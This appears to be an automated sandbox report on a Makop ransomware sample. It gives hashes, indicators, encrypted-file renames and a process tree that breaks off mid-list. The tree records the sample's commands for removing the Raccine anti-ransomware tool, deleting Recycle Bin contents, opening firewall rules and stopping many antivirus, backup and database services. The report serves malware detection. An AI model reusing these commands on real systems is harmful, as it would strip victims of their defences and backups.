Analysis
-
max time kernel
66s -
max time network
33s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
23-04-2021 13:03
Static task
static1
Behavioral task
behavioral1
Sample
net_shares.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
net_shares.exe
Resource
win10v20210410
General
-
Target
net_shares.exe
-
Size
114KB
-
MD5
07807a9e2aeb0ccc03d88debebcdd2eb
-
SHA1
13a93e6e785d8f42f062b55fe5ea1ba9e0e139ab
-
SHA256
1136907e76399f1d76694ee9c540b387ed6a5b12340b60f3fabfc183bca457df
-
SHA512
1cc1ecab6047c7cc2e81b6b5a9266c25fd9d2a7d26865c0e7554882c0f28f47453fb3c6abc9a613f9af62cf4dd456d079da67897459c9f4d88adb7715547093a
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
makop
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
makop
Signatures
-
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
net_shares.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk net_shares.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 2492 icacls.exe 2200 icacls.exe 2124 icacls.exe -
Drops file in Program Files directory 20 IoCs
Processes:
net_shares.exedescription ioc process File opened for modification C:\Program Files\ApproveJoin.M2V.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\ConnectComplete.mov.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\RestoreUndo.mp3.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\SubmitRepair.vsx.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\CompleteGrant.wmf.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\MoveDisable.wps.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\RedoEnable.png.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\WriteUse.ADTS.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\CompareExport.WTV.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\GrantExpand.xht.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\RenameResolve.bmp.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\RestartConnect.aifc.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\ResumeReceive.ini.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\SearchRestore.asf.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\UnprotectResize.sys.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\NewResolve.contact.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\ReadJoin.ini.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\RemoveLimit.midi.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\SwitchWait.rmi.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Program Files\UseInitialize.svgz.[ID-40707513].uo8bpy net_shares.exe -
Drops file in Windows directory 14 IoCs
Processes:
net_shares.exedescription ioc process File opened for modification C:\Windows\WindowsShell.Manifest net_shares.exe File opened for modification C:\Windows\WindowsUpdate.log.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\PFRO.log.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\Professional.xml.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\setupact.log.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\Starter.xml.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\win.ini.[ID-40707513].uo8bpy net_shares.exe File created C:\Windows\RESTORE_FILES_INFO.txt net_shares.exe File created C:\Windows\bootstat.dat.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\DtcInstall.log.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\msdfmap.ini.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\system.ini.[ID-40707513].uo8bpy net_shares.exe File opened for modification C:\Windows\TSSysprep.log.[ID-40707513].uo8bpy net_shares.exe File created C:\Windows\WindowsShell.Manifest.[ID-40707513].uo8bpy net_shares.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1620 taskkill.exe 2876 taskkill.exe 2916 taskkill.exe 3004 taskkill.exe 1648 taskkill.exe 2688 taskkill.exe 2704 taskkill.exe 1920 taskkill.exe 2200 taskkill.exe 1996 taskkill.exe 2488 taskkill.exe 3064 taskkill.exe 2156 taskkill.exe 280 taskkill.exe 452 taskkill.exe 2400 taskkill.exe 2384 taskkill.exe 2804 taskkill.exe 2384 taskkill.exe 2272 taskkill.exe 2660 taskkill.exe 2476 taskkill.exe 2900 taskkill.exe 956 taskkill.exe 2116 taskkill.exe 2820 taskkill.exe 512 taskkill.exe 892 taskkill.exe 1128 taskkill.exe 3008 taskkill.exe 1696 taskkill.exe 2260 taskkill.exe 2472 taskkill.exe 2980 taskkill.exe 1032 taskkill.exe 2340 taskkill.exe 2576 taskkill.exe 2404 taskkill.exe 3064 taskkill.exe 1512 taskkill.exe 2916 taskkill.exe 2700 taskkill.exe 2276 taskkill.exe 340 taskkill.exe 2104 taskkill.exe 3028 taskkill.exe 2508 taskkill.exe 2264 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2440 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
net_shares.exepid process 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe 1632 net_shares.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
net_shares.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 1632 net_shares.exe Token: SeDebugPrivilege 512 taskkill.exe Token: SeDebugPrivilege 2384 taskkill.exe Token: SeDebugPrivilege 2404 taskkill.exe Token: SeDebugPrivilege 340 taskkill.exe Token: SeDebugPrivilege 2272 taskkill.exe Token: SeDebugPrivilege 3064 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 892 taskkill.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 2660 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 3028 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 2476 taskkill.exe Token: SeDebugPrivilege 2916 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 956 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 2472 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 2688 taskkill.exe Token: SeDebugPrivilege 2876 taskkill.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2488 taskkill.exe Token: SeDebugPrivilege 2704 taskkill.exe Token: SeDebugPrivilege 3064 taskkill.exe Token: SeDebugPrivilege 2156 taskkill.exe Token: SeDebugPrivilege 2820 taskkill.exe Token: SeDebugPrivilege 2980 taskkill.exe Token: SeDebugPrivilege 2116 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 280 taskkill.exe Token: SeDebugPrivilege 452 taskkill.exe Token: SeDebugPrivilege 2916 taskkill.exe Token: SeDebugPrivilege 3004 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 2264 taskkill.exe Token: SeDebugPrivilege 2400 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2384 taskkill.exe Token: SeDebugPrivilege 2804 taskkill.exe Token: SeDebugPrivilege 2816 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
net_shares.exepid process 1632 net_shares.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
net_shares.exepid process 1632 net_shares.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
net_shares.exenet.exenet.exenet.exedescription pid process target process PID 1632 wrote to memory of 512 1632 net_shares.exe taskkill.exe PID 1632 wrote to memory of 512 1632 net_shares.exe taskkill.exe PID 1632 wrote to memory of 512 1632 net_shares.exe taskkill.exe PID 1632 wrote to memory of 1732 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 1732 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 1732 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 1768 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 1768 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 1768 1632 net_shares.exe reg.exe PID 1632 wrote to memory of 280 1632 net_shares.exe schtasks.exe PID 1632 wrote to memory of 280 1632 net_shares.exe schtasks.exe PID 1632 wrote to memory of 280 1632 net_shares.exe schtasks.exe PID 1632 wrote to memory of 1816 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 1816 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 1816 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 112 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 112 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 112 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 548 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 548 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 548 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 632 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 632 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 632 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1780 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1780 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1780 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 732 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 732 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 732 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1528 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1528 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1528 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1744 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1744 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1744 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 1584 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 1584 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 1584 1632 net_shares.exe cmd.exe PID 1632 wrote to memory of 752 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 752 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 752 1632 net_shares.exe sc.exe PID 1632 wrote to memory of 572 1632 net_shares.exe netsh.exe PID 1632 wrote to memory of 572 1632 net_shares.exe netsh.exe PID 1632 wrote to memory of 572 1632 net_shares.exe netsh.exe PID 1632 wrote to memory of 1128 1632 net_shares.exe net.exe PID 1632 wrote to memory of 1128 1632 net_shares.exe net.exe PID 1632 wrote to memory of 1128 1632 net_shares.exe net.exe PID 1632 wrote to memory of 1020 1632 net_shares.exe net.exe PID 1632 wrote to memory of 1020 1632 net_shares.exe net.exe PID 1632 wrote to memory of 1020 1632 net_shares.exe net.exe PID 1632 wrote to memory of 820 1632 net_shares.exe net.exe PID 1632 wrote to memory of 820 1632 net_shares.exe net.exe PID 1632 wrote to memory of 820 1632 net_shares.exe net.exe PID 1128 wrote to memory of 336 1128 net.exe net1.exe PID 1128 wrote to memory of 336 1128 net.exe net1.exe PID 1128 wrote to memory of 336 1128 net.exe net1.exe PID 1020 wrote to memory of 1660 1020 net.exe net1.exe PID 1020 wrote to memory of 1660 1020 net.exe net1.exe PID 1020 wrote to memory of 1660 1020 net.exe net1.exe PID 820 wrote to memory of 1792 820 net.exe net1.exe PID 820 wrote to memory of 1792 820 net.exe net1.exe PID 820 wrote to memory of 1792 820 net.exe net1.exe PID 1632 wrote to memory of 1492 1632 net_shares.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\net_shares.exe"C:\Users\Admin\AppData\Local\Temp\net_shares.exe"1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
